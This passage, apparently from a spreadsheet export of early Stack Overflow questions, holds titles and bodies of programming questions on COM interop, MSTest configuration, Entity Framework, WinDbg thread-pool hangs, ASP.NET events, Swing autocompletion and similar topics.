&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;to&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;mshtml.HTMLDocumentClass webDocument = (mshtml.HTMLDocumentClass)ie.Document;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;If you're wondering, &lt;strong&gt;ie&lt;/strong&gt; is declared as:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;IWebBrowser2 ie;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;and IWebBrowser2's declaration of ie.Document is:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;[ComImport, DefaultMember("Name"), 
      Guid("D30C1661-CDAF-11D0-8A3E-00C04FC9E26E"), 
      InterfaceType(ComInterfaceType.InterfaceIsIDispatch),
      SuppressUnmanagedCodeSecurity]
public interface IWebBrowser2
{
   ...
   object Document { [return: MarshalAs(UnmanagedType.IDispatch)] [DispId(0xcb)] get; }
   ...
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;So it's an &lt;strong&gt;Object&lt;/strong&gt;, that also supports &lt;strong&gt;IDispatch&lt;/strong&gt;. Nowhere in any of my code is mentioned a type called "mshtml.HTMLDocumentClass".&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Note:&lt;/strong&gt; If you think it can be cast to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;System.Windows.Forms.HtmlDocument
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;you would be mistaken.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;If you're wondering why i'm doing this, then change all variable names and class types into random strings to obfuscate the example.&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/484770/visual-studio-how-to-figure-out-where-this-type-is-defined#484830"&gt;chakrit&lt;/a&gt; suggested using "*Go to Definition** of the &lt;strong&gt;ie.Document&lt;/strong&gt; member, which unfortunatly goes to the declaration of ie.Document:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i41.tinypic.com/96dwmd.jpg" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;And also the declaration of &lt;strong&gt;Object&lt;/strong&gt; brings me to the declaration of &lt;strong&gt;Object&lt;/strong&gt;:&lt;/p&gt;
&lt;p&gt;&lt;img src="http://i41.tinypic.com/28qta9z.jpg" alt="alt text" /&gt;&lt;/p&gt;
&lt;p&gt;&lt;hr /&gt;&lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/484770/visual-studio-how-to-figure-out-where-this-type-is-defined#484830"&gt;chakrit&lt;/a&gt; had a really good suggestion:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;public static string TellMeAboutThisObject(object obj)
{
   Type t = obj.GetType();
   Assembly asm = t.Assembly;
   return 
         "Type Name: "+t.FullName+Environment.NewLine+
         "Namspace: " + t.Namespace+Environment.NewLine+
         "From assembly: "+ asm.FullName+Environment.NewLine+
         "Located at: "+asm.Location;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Which in my case returns:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;&lt;strong&gt;Type Name:&lt;/strong&gt; mshtml.HTMLDocumentClass&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Namspace:&lt;/strong&gt; mshtml &lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;From assembly:&lt;/strong&gt; Microsoft.mshtml, Version=7.0.3300.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a&lt;/p&gt;
  &lt;p&gt;&lt;strong&gt;Located at:&lt;/strong&gt; C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;So, in my case it's the damnest thing that someone is automagically adding a reference to a managed assembly - when i was trying to interop with COM directly.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>MSTest.exe not finding app.config</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm currently trying to run MSTest.exe from NCover, but I believe the question could apply generally to running MSTest.exe from the command line.&lt;/p&gt;
&lt;p&gt;If I have the "/noisolation" argument, then MSTest.exe appears to find and use the app.config as expected.  Without it, NCover doesn't capture any coverage information.  From my research so far, it seems NCover needs /noisolation.  So the question is how to get my *.config files to work when that argument is passed.&lt;/p&gt;
&lt;p&gt;My NCover settings are:&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Application to Profile&lt;/strong&gt;&lt;br /&gt;
C:\Program Files (x86)\Microsoft Visual Studio 9.0\Common7\IDE\MSTest.exe&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Working Folder&lt;/strong&gt;&lt;br /&gt;
C:\Documents and Settings\MyProfile\My Documents\Visual Studio 2008\Projects\XYZ\XYZ.CoreTest\bin\Debug&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Application arguments&lt;/strong&gt;&lt;br /&gt;
/noisolation /testcontainer:"C:\Documents and Settings\MyProfile\My Documents\Visual Studio 2008\Projects\XYZ\XYZ.CoreTest\bin\Debug\XYZ.CoreTest.dll"&lt;/p&gt;
&lt;p&gt;&lt;br /&gt;&lt;br /&gt;
Update:  I added a trace showing that my config is (not surprisingly) trying to read from "C:\Program Files (x86)\Microsoft Visual Studio 9.0\Common7\IDE\MSTest.exe.Config".&lt;/p&gt;
&lt;p&gt;Update 2: If at all possible, I don't want to edit MSTest.exe.Config.  That just isn't terribly portable.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Are There Any Good Ruby, Rails or .Net Libraries for Working with Barcodes?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Does anyone know any good Ruby, Rails or .Net specific libraries for working with barcodes?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How would you determine where each property and method of a Python class is defined?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Given an instance of some class in Python, it would be useful to be able to determine which line of source code &lt;em&gt;defined&lt;/em&gt; each method and property (e.g. to implement [1]). For example, given a module ab.py&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class A(object):
    z = 1
    q = 2
    def y(self): pass
    def x(self): pass
class B(A):
    q = 4
    def x(self): pass
    def w(self): pass
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;define a function whither(class_, attribute) returning a tuple containing the filename, class, and line in the source code that defined or subclassed &lt;code&gt;attribute&lt;/code&gt;. This means the definition in the class body, not the latest assignment due to overeager dynamism. It's fine if it returns 'unknown' for some attributes.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;gt;&amp;gt;&amp;gt; a = A()
&amp;gt;&amp;gt;&amp;gt; b = B()
&amp;gt;&amp;gt;&amp;gt; b.spigot = 'brass'
&amp;gt;&amp;gt;&amp;gt; whither(a, 'z')
("ab.py", &amp;lt;class 'a.A'&amp;gt;, [line] 2)
&amp;gt;&amp;gt;&amp;gt; whither(b,  'q')
("ab.py", &amp;lt;class 'a.B'&amp;gt;, 8)
&amp;gt;&amp;gt;&amp;gt; whither(b, 'x')
("ab.py", &amp;lt;class 'a.B'&amp;gt;, 9)
&amp;gt;&amp;gt;&amp;gt; whither(b, 'spigot')
("Attribute 'spigot' is a data attribute")
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to use this while introspecting Plone, where every object has hundreds of methods and it would be really useful to sort through them organized by class and not just alphabetically.&lt;/p&gt;
&lt;p&gt;Of course, in Python you can't always reasonably know, but it would be nice to get good answers in the common case of mostly-static code.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Achieving emailing between website users without "Mailing Server" configuring?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have requirement like, each user of the site
will be mailing any other user and I have rules for that communication
(let them aside for now). So user1 will be picking an email id like:
mypickeduser1n...@sitedomain.com and will be sending an email to
user2, whose email id will be like:
mypickeduser2n...@sitedomain.com. Like that any number of users will
be sending emails to any numbers of users. And any outsider should be
able to send an email to mypickeduser2n...@sitedomain.com. My question
is,So in this context, do I need to build my own smtp(setup mailing)
servers. I am totally a newbie in the smtp arena. Can I achieve the
email communication between the users without "mailing server"
configurations?
Can this be achievable? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>Calling a remote COM+ ServicedComponent from a C# client</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a serviced component installed in a COM+ server application. I want to create an instance from a remote client. The client needs to be able to specify the server machine's name dynamically. How do I do this?&lt;/p&gt;
&lt;p&gt;I tried using Activator:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;            (XSLTransComponent.XSLTransformer)Activator.GetObject(
                        typeof(XSLTransComponent.XSLTransformer),
                        serverName
                        );
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;But I get this:&lt;/p&gt;
&lt;p&gt;System.Runtime.Remoting.RemotingException: Cannot create channel sink to connect to URL 'server'. An appropriate channel has probably not been registered.
   at System.Runtime.Remoting.RemotingServices.Unmarshal(Type classToProxy, String url, Object data)&lt;/p&gt;
&lt;p&gt;Do I need to register a channel? If so, how?&lt;/p&gt;
&lt;p&gt;Another idea is to use Marshall.BindToMoniker, but how do I specify a moniker for a remote object hosted on COM+ on server x?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Entity Framework AddTo function inconsistency?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Let me describe the behavior I get:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Load a user from the database: this means the user is attached to the context&lt;/li&gt;
&lt;li&gt;Create a new Object C:
&lt;ul&gt;
&lt;li&gt;C tempC = new C();&lt;/li&gt;
&lt;li&gt;tempC.User = previously loaded user;&lt;/li&gt;
&lt;li&gt;Context.AddToCSet( tempC );&lt;/li&gt;
&lt;li&gt;The last line throws an exception because the object was added to the context when the property user was set.&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;but if I do the following:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Load a user from the database: this means the user is attached to the context&lt;/li&gt;
&lt;li&gt;Create a new Object C:
&lt;ul&gt;
&lt;li&gt;C tempC = new C();&lt;/li&gt;
&lt;li&gt;tempC.User = previously loaded user;&lt;/li&gt;
&lt;li&gt;Context.SaveChange();&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;li&gt;Create a new Object E which has a relationship with Object C.
&lt;ul&gt;
&lt;li&gt;E tempE = new E();&lt;/li&gt;
&lt;li&gt;tempE.C = previously created C;&lt;/li&gt;
&lt;li&gt;Context.AddToESet( tempE );&lt;/li&gt;
&lt;/ul&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;it &lt;em&gt;doesn't&lt;/em&gt; throw an exception. I was expecting an exception because by then C is attached to the context, which should be the same case as the first example. But it isn't. Why, and what can I do to have some consistency?&lt;/p&gt;
&lt;p&gt;I am planning on checking the state of the object (EntityState == Detached) before adding it to the set, but I figured I must be doing something wrong to begin with.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How can I parse Serv-U FTP logs with SSIS?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;A while back I needed to parse a bunch of Serve-U FTP log files and store them in a database so people could report on them. I ended up developing a small C# app to do the following:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;&lt;p&gt;Look for all files in a dir that have not been loaded into the db (there is a table of previously loaded files). &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Open a file and load all the lines into a list. &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Loop through that list and use RegEx to identify the kind of row (CONNECT, LOGIN, DISCONNECT, UPLOAD, DOWNLOAD, etc), parse it into a specific kind of object corresponding to the kind of row and add that obj to another List.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Loop through each of the different object lists and write each one to the associated database table. &lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Record that the file was successfully imported.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;Wash, rinse, repeat.&lt;/p&gt;&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;It's ugly but it got the job done for the deadline we had.&lt;/p&gt;
&lt;p&gt;The problem is that I'm in a DBA role and I'm not happy with running a compiled app as the solution to this problem.  I'd prefer something more open and more DBA-oriented.&lt;/p&gt;
&lt;p&gt;I could rewrite this in PowerShell but I'd prefer to develop an SSIS package. I couldn't find a good way to split input based on RegEx within SSIS the first time around and I wasn't familiar enough with SSIS. I'm digging into SSIS more now but still not finding what I need. &lt;/p&gt;
&lt;p&gt;Does anybody have any suggestions about how I might approach a rewrite in SSIS?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Will Emacs make me a better programmer?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;Steve Yegge wrote &lt;a href="http://steve.yegge.googlepages.com/tour-de-babel"&gt;a comment on his blog&lt;/a&gt;:&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;All of the greatest engineers in the
  world use Emacs. The world-changer
  types. Not the great gal in the cube
  next to you. Not Fred, the amazing guy
  down the hall. I'm talking about the
  greatest software developers of our
  profession, the ones who changed the
  face of the industry. The James
  Goslings, the Donald Knuths, the Paul
  Grahams, the Jamie Zawinskis, the
  Eric Bensons. Real engineers use
  Emacs. You have to be way smart to use
  it well, and it makes you incredibly
  powerful if you can master it. Go look
  over Paul Nordstrom's shoulder while
  he works sometime, if you don't
  believe me. It's a real eye-opener for
  someone who's used Visual Blub
  .NET-like IDEs their whole career. &lt;/p&gt;
  &lt;p&gt;Emacs is the 100-year editor.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The last time I used a text editor for writing code was back when I was still writing HTML in Notepad about 1000 years ago. Since then, I've been more or less IDE dependent, having used Visual Studio, NetBeans, IntelliJ, Borland/Codegear Studio, and Eclipse for my entire career.&lt;/p&gt;
&lt;p&gt;For what it's worth, I &lt;em&gt;have&lt;/em&gt; tried Emacs, and my experience was a frustrating one because of its complete lack of out-of-the-box discoverable features. (Apparently there's an Emacs command for discovering other Emacs commands, which I couldn't find by the way -- it's like living your own cruel Zen-like joke.) I tried to make myself like the program for a good month, but eventually decided that I'd rather have drag-and-drop GUI designers, IntelliSense, and interactive debugging instead.&lt;/p&gt;
&lt;p&gt;It's hard to separate fact from fanboyism, so I'm not willing to take Yegge's comments at face value just yet.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Is there a measurable difference in skill, productivity, or programming enjoyment between people who depend on IDEs and those who don't, or is it all just fanboyism?&lt;/strong&gt;&lt;/p&gt;
</t>
  </si>
  <si>
    <t>WinDbg -- TraceListener and Saturated ThreadPool</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a multithreaded .NET Windows Service that hangs intermittently -- maybe once every two weeks of 24/7 operation. When the hangs occurs the threadpool is completely saturated because calls to our custom tracelistener start blocking for some reason. There aren't any locks in the offending code nor anything blocking according to windbg, but they're definitely blocking somewhere. There aren't any exceptions on the stack either. There is a Thread.Sleep(1) that will occasionally be hit in the BufferedStream.Write code, but my question is what is the ReOpenMetaDataWithMemory, CreateApplicationContext, and DllCanUnloadNow mean?&lt;/p&gt;
&lt;p&gt;Nearly all of the 2000 hung up worker threads (not normal operation!) on the ThreadPool have a stack similar to the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;0:027&amp;gt; !dumpstack
OS Thread Id: 0x1638 (27)
Child-SP         RetAddr          Call Site
000000001d34df58 0000000077d705d6 ntdll!ZwDelayExecution+0xa
000000001d34df60 000006427f88901d kernel32!SleepEx+0x96
000000001d34e000 000006427f454379 mscorwks!DllCanUnloadNowInternal+0xf53d
000000001d34e080 000006427fa34749 mscorwks!CreateApplicationContext+0x41d
000000001d34e0e0 0000064280184902 mscorwks!ReOpenMetaDataWithMemory+0x1ff59
000000001d34e290 0000064280184532 Company_Common_Diagnostics!Company.Common.Diagnostics.BufferedStream.Write(Byte[], Int32, Int32)+0x1b2
000000001d34e300 00000642801831fd Company_Common_Diagnostics!Company.Common.Diagnostics.XmlRollingTraceListener+TraceWriter.Write(System.String)+0x52
000000001d34e350 00000642801b3304 Company_Common_Diagnostics!Company.Common.Diagnostics.XmlRollingTraceListener.InternalWrite(System.Text.StringBuilder)+0x3d
000000001d34e390 0000064274e9d7ec Company_Common_Diagnostics!Company.Common.Diagnostics.XmlRollingTraceListener.TraceTransfer(System.Diagnostics.TraceEventCache, System.String, Int32, System.String, System.Guid)+0xc4
000000001d34e410 00000642801b2f59 System_ni!System.Diagnostics.TraceSource.TraceTransfer(Int32, System.String, System.Guid)+0x2ec
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>ASP.NET - temporarily impersonate the app pool service ID when default it to impersonate the user?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have to call some code in a SharePoint site that runs under the same service ID that the web application is running under.  By default, SharePoint impersonates the user viewing the web page, and the users don't have the necessary permissions.&lt;/p&gt;
&lt;p&gt;What is the best way to run some code using the web application's service ID, then revert back to using the default impersonation?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Accessing Word documents in a Rails app</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a number of documents (mainly Word and Excel) that I'd like to make available to users of my Rails app. However, I've never tried something like this before and was wondering what the best way to do this was? Seeing as there will only be a small number of Word documents, and all will be uploaded by me, do I just store them somewhere in my Rails app (i.e. public/docs or similar) or should I set up a separate FTP and link to that? Perhaps there's an even better way of doing this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C++ Tokenizing using iterators in an eof() cycle</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm trying to adapt this answer &lt;/p&gt;
&lt;p&gt;&lt;a href="http://stackoverflow.com/questions/53849/how-do-i-tokenize-a-string-in-c#53921"&gt;http://stackoverflow.com/questions/53849/how-do-i-tokenize-a-string-in-c#53921&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;to my current string problem which involves reading from a file till eof. &lt;/p&gt;
&lt;p&gt;from this source file:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;Fix grammatical or spelling errors
Clarify meaning without changing it
Correct minor mistakes
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I want to create a vector  with all the tokenized words. Example: v&lt;code&gt;ector&amp;lt;string&amp;gt; allTheText[0] should be "Fix"&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;I don't understad the purpose of &lt;code&gt;istream_iterator&amp;lt;std::string&amp;gt; end;&lt;/code&gt; but I included cause it was on the original poster's answer. &lt;/p&gt;
&lt;p&gt;So far, I've got this non-working code:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;vector&amp;lt;string&amp;gt; allTheText;
          stringstream strstr;
          istream_iterator&amp;lt;std::string&amp;gt; end;
          istream_iterator&amp;lt;std::string&amp;gt; it(strstr);
          while (!streamOfText.eof()){
                getline (streamOfText, readTextLine);
                cout&amp;lt;&amp;lt;readTextLine&amp;lt;&amp;lt;endl;
                stringstream strstr(readTextLine);
                // how should I initialize the iterators it and end here?
                }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Edit:&lt;/p&gt;
&lt;p&gt;I changed the code to &lt;/p&gt;
&lt;pre&gt;&lt;code&gt;          vector&amp;lt;string&amp;gt; allTheText;
          stringstream strstr;
          istream_iterator&amp;lt;std::string&amp;gt; end;
          istream_iterator&amp;lt;std::string&amp;gt; it(strstr);
          while (getline(streamOfText, readTextLine)) {
               cout &amp;lt;&amp;lt; readTextLine &amp;lt;&amp;lt; endl;
        vector&amp;lt;string&amp;gt; vec((istream_iterator&amp;lt;string&amp;gt;(streamOfText)), istream_iterator&amp;lt;string&amp;gt;()); // generates RuntimeError
          }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;And got a RuntimeError, why?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Different performance between Java and c# code when testing URL</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;When running the following Java code, I get very accurate and consistent results in determining if the web page I'm testing is up.&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected synchronized boolean checkUrl(HttpURLConnection connection){
	boolean error = false;
	//HttpURLConnection connection = null;
	GregorianCalendar calendar = new GregorianCalendar();
	try{
		if(connection != null){
			connection.connect();
			//200 is the expected HTTP_OK response
			error = processResponseCode(connection.getResponseCode());
			connection.disconnect();
		} else{
			error = false;
		}
	}catch(java.net.UnknownHostException uhe){
		...		} 
	catch(Exception e){
		...		}
	return error;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;The closest match to the Java pattern in c# has much higher results of false positives (mostly due to timeouts - which has a default period of 100000ms).&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected bool connectedToUrl = false;
        response = null;
        HttpWebRequest webreq = (HttpWebRequest)WebRequest.Create(this.getUri());
        webreq.Credentials = CredentialCache.DefaultCredentials;
        WebResponse res = null;// webreq.GetResponse();
        try
        {
            WebRequest request = WebRequest.Create(this.getUri()) as WebRequest;
            request.Credentials = CredentialCache.DefaultCredentials;
            if (request != null)
            {
                // Get response 
                res = webreq.GetResponse();
                connectedToUrl = processResponseCode(res);
            }
            else
            {
                logger.Fatal(getFatalMessage());
                string error = string.Empty;
            }
        }
        catch (Exception e)
        {
            throw e;
        }
        return connectedToUrl;
    }
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;I have tried various patterns in c# to match the effectiveness of the quoted Java code, to no avail. &lt;/p&gt;
&lt;p&gt;Any ideas?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Highest Performance Database Storage Mechanism</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I need ideas to implement a (really) high performance in-memory Database/Storage Mechanism. In the range of storing 20,000+ objects, with each object updated every 5 or so seconds.  &lt;strong&gt;I would like a FOSS solution&lt;/strong&gt;.&lt;/p&gt;
&lt;p&gt;What is my best option? What are your experiences?&lt;/p&gt;
&lt;p&gt;I am working primarily in Java, but I need the datastore to have good performance so the datastore solution need not be java centric.&lt;/p&gt;
&lt;p&gt;I also need like to be able to Query these objects and I need to be able to restore all of the objects on program startup.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why isn't the SelectedIndexChanged event firing from a dropdownlist in a GridView?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I cannot get my SelectedIndexChanged of my dropdownlist to fire.  I have the following:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;&amp;lt;form id="form1" runat="server"&amp;gt;
&amp;lt;div&amp;gt;
&amp;lt;asp:GridView id="grdPoll" runat="server" AutoGenerateColumns="false"&amp;gt;
    &amp;lt;Columns&amp;gt;
        &amp;lt;asp:TemplateField&amp;gt;
            &amp;lt;ItemTemplate&amp;gt;
                &amp;lt;asp:DropDownList ID="DropDownList1" runat="server" 
                 AutoPostBack="true"
                 OnSelectedIndexChanged="DropDownList1_SelectedIndexChanged"&amp;gt;
                    &amp;lt;asp:ListItem Text="Review" Value="Review" Selected="True"&amp;gt;Review&amp;lt;/asp:ListItem&amp;gt;
                    &amp;lt;asp:ListItem Text="Level1" Value="lvl1"&amp;gt;Send Back to Level1&amp;lt;/asp:ListItem&amp;gt;
    			&amp;lt;/asp:DropDownList&amp;gt;
    		&amp;lt;/ItemTemplate&amp;gt;
    	&amp;lt;/asp:TemplateField&amp;gt;
    &amp;lt;/Columns&amp;gt;
&amp;lt;/asp:GridView&amp;gt;
&amp;lt;asp:Label ID="lblCity" runat="server" Text="Label"&amp;gt;&amp;lt;/asp:Label&amp;gt;  
&amp;lt;/div&amp;gt;
&amp;lt;/form&amp;gt;
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;In my code behind I have this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;protected void DropDownList1_SelectedIndexChanged(object sender, EventArgs e)
{
    this.lblCity.Text = ((DropDownList)sender).SelectedValue;
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;If I put this same ddl outside of the gridview, it fires.&lt;/p&gt;
&lt;p&gt;The postback is occurring and the autopostback is set to true.  The event just never fires.  Why can't I get my event to fire from within the gridview?&lt;/p&gt;
&lt;p&gt;Thank you.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Castle Windsor: So what DOES ActAs do?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I noticed that the castle windsor fluent component registration interface has the rather confusing ActAs() method.&lt;/p&gt;
&lt;p&gt;Googling around for it the only reference I found was at their wiki &lt;a href="http://using.castleproject.org/display/IoC/Fluent+Registration+API" rel="nofollow"&gt;here&lt;/a&gt;.&lt;/p&gt;
&lt;blockquote&gt;
  &lt;p&gt;TODO (Stuff that could be documented)&lt;/p&gt;
  &lt;ul&gt;
  &lt;li&gt;what does ActAs() do?&lt;/li&gt;
  &lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Not too helpful.&lt;/p&gt;
&lt;p&gt;The source doesn't seem to have any unit tests for the method that would give a clue to its usage and I'm too unfamiliar with their source to be able to tell for myself what is going on.&lt;/p&gt;
&lt;p&gt;Does anyone know any more about this?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Controllers in Grails</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm writing a small webapp in Grails and I have the following question regarding best practices for controller design and using GORM:&lt;/p&gt;
&lt;p&gt;I'm storing the user object in session.user. Currently all my action methods start with the following code to make sure a valid user is logged in and that the user object is fresh:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;class FooController {
  def actionMethodThatRequiresAValidUser = {
    if (!session?.user) {
      redirect(controller: "authentication", action: "login")
    }
    session.user.refresh()
    ...
    /* do stuff */
    ...
  }
}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;Is that best practice? Can it be done in a better and/or more concise way?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>How could I implement autocompletion using Swing?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I'm interested in providing an autocompletion box in a JFrame. The triggering mechanism will be based on mnemonics (I think), but I'm not really sure what to use for the "autocompletion box" (I would like results to be filtered as the user presses keys).&lt;/p&gt;
&lt;p&gt;How would you implement this? Some sort of JFrame, or a JPopupMenu? &lt;/p&gt;
&lt;p&gt;I would like to know how this is implemented, so please don't post links to available [J]Components.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Portable / Interoperable WCF Contracts</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I was wondering if anybody out there had some good tips/dos and don'ts for designing WCF contracts with a mind for web-service interoperability, both in terms of older Microsoft web service  technologies (e.g. WSE) and non-Microsoft technologies such as Java calling WCF web services. &lt;/p&gt;
&lt;p&gt;For example: are there any special rules that need to be taken into account when exposing DateTime as a type in your contract? How about Dictionaries and Hashtables? What are the issues you might run into with the various bindings available? &lt;/p&gt;
</t>
  </si>
  <si>
    <t>OleDbPermission in .NET Framework 3.5</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a windows program in .net framework 3.5 to update an access database, I need to set the permission to full trust level. the client don't have the framework configuration tools installed on their server, so is there any other place that I can make this change?&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Keys / Values Functionality to Iterators in C++</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I know this questions has come up in various guises before, but this is slightly different.&lt;/p&gt;
&lt;p&gt;I have a class which contains a std::map. Although I wish to use the map for other purposes inside the class, externally I want to expose an iterator adapter to just the values inside the map (ie the second item in the std::pair).&lt;/p&gt;
&lt;p&gt;For example in python I might do something like this:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;def __iter__(self):
    return self._dict.itervalues()
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;How do I go about doing this in c++, hiding the implementation inside the class?&lt;/p&gt;
&lt;p&gt;Thanks,&lt;/p&gt;
&lt;p&gt;Dan&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Algorithm for drawing an anti-aliased circle?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;What's a good algorithm for drawing anti-aliased circles? (Filled and not filled.)&lt;/p&gt;
</t>
  </si>
  <si>
    <t>Why would my java program send multicast packets with a TTL of 1?</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a java client program that uses mdns with service discovery to find its associated server.  After much testing on a single network with Windows, Fedora 10, and Ubuntu 8.10, we delivered a test build to a customer.  They report that the client and server never connect.  They sent us a wireshark capture that shows the mdns packets have a TTL of 1 even though our code sets it to 32.  When we test locally, the TTL is 32 just like we set it.  The customer is using Redhat Enterprise 5.  &lt;/p&gt;
&lt;p&gt;I saw &lt;a href="http://stackoverflow.com/questions/139909/java-multicast-time-to-live-is-always-0"&gt;Java Multicast Time To Live is always 0&lt;/a&gt; but it leaves me curious as to why that question asker has a TTL of 0, but mine is 1.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>ASP.NET MVC RC1 - Custom View Engine for Areas - FindView override not firing</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have a custom view engine in ASP.NET MVC and since upgrading to RC1 my custom view engine that implements Areas &lt;a href="http://haacked.com/archive/2008/11/04/areas-in-aspnetmvc.aspx" rel="nofollow"&gt;as in this post by Phil Haack&lt;/a&gt; does not enter the override method FindView, thus breaking any controllers that sit within an area as the application is unable to find them.  As I'm aware that a good number of people are using areas in their MVC applications, is anyone aware of a solution to this problem or why it happens?&lt;/p&gt;
&lt;p&gt;Below is my findview method for reference.&lt;/p&gt;
